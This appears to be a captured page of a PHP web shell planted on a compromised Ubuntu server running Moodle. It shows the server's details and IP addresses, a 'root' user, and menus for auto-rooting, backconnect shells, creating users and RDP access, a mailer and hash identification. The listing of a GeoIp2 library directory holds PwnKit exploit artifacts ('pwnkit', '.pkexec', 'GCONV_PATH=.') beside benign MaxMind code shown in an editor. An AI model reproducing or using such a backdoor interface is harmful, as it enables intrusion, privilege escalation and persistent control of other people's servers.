Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
maxmind /
GeoIp2 /
Record /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AbstractPlaceRecord.php
1.2
KB
-rwxrwxrwx
AbstractRecord.php
1.28
KB
-rwxrwxrwx
City.php
1.02
KB
-rwxrwxrwx
Continent.php
1.04
KB
-rwxrwxrwx
Country.php
1.5
KB
-rwxrwxrwx
Location.php
2.06
KB
-rwxrwxrwx
MaxMind.php
400
B
-rwxrwxrwx
Postal.php
836
B
-rwxrwxrwx
RepresentedCountry.php
758
B
-rwxrwxrwx
Subdivision.php
1.45
KB
-rwxrwxrwx
Traits.php
6.03
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Country.php
<?php namespace GeoIp2\Record; /** * Contains data for the country record associated with an IP address. * * This record is returned by all location services and databases. * * @property-read int|null $confidence A value from 0-100 indicating MaxMind's * confidence that the country is correct. This attribute is only available * from the Insights service and the GeoIP2 Enterprise database. * @property-read int|null $geonameId The GeoName ID for the country. This * attribute is returned by all location services and databases. * @property-read bool $isInEuropeanUnion This is true if the country is a * member state of the European Union. This attribute is returned by all * location services and databases. * @property-read string|null $isoCode The two-character ISO 3166-1 alpha code * for the country. See https://en.wikipedia.org/wiki/ISO_3166-1. This * attribute is returned by all location services and databases. * @property-read string|null $name The name of the country based on the locales * list passed to the constructor. This attribute is returned by all location * services and databases. * @property-read array|null $names An array map where the keys are locale codes * and the values are names. This attribute is returned by all location * services and databases. */ class Country extends AbstractPlaceRecord { /** * @ignore */ protected $validAttributes = [ 'confidence', 'geonameId', 'isInEuropeanUnion', 'isoCode', 'names', ]; }
Close